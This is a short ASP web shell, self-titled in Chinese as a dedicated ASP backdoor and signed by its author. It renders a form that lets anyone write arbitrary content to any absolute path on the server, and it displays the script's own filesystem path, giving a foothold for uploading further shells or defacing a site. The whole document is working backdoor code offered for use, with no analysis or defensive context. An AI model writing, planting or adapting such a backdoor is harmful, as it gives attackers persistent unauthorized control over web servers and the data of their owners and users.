-
<html>
-
<head>
-
<title>七步倒┈→专用asp后门</title>
-
</head>
-
</html>
-
<%dim objFSO%>
-
<%dim fdata%>
-
<%dim objCountFile%>
-
<%on error resume next%>
-
<%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>
-
<%if Trim(request("syfdpath"))<>"" then%>
-
<%fdata = request("cyfddata")%>
-
<%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
-
<%objCountFile.Write fdata%>
-
<%if err =0 then%>
-
<%response.write "<font color=blue>Save Success!</font>"%>
-
<%else%>
-
<%response.write "<font color=red>Save UnSuccess!</font>"%>
-
<%end if%>
-
<%err.clear%>
-
<%end if%>
-
<%objCountFile.Close%>
-
<%Set objCountFile=Nothing%>
-
<%Set objFSO = Nothing%>
-
<%Response.write "<form action='''' method=post>"%>
-
<%Response.write "<font color=blue>save file绝对路径:</font>"%>
-
<%Response.Write "<input type=text name=syfdpath width=32 size=50>"%>
-
<%Response.Write "<br>"%>
-
<%Response.write "<font color=red>file of 绝对路径"%>
-
<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>
-
<%Response.write "<br>"%>
-
<%Response.write "input:"%>
-
<%Response.write "<textarea name=cyfddata cols=80 rows=10
-
width=50></textarea>"%>
-
<%Response.write "<input type=submit value=save>"%>
-
<%Response.write "</form>"%>
-
BY:七步倒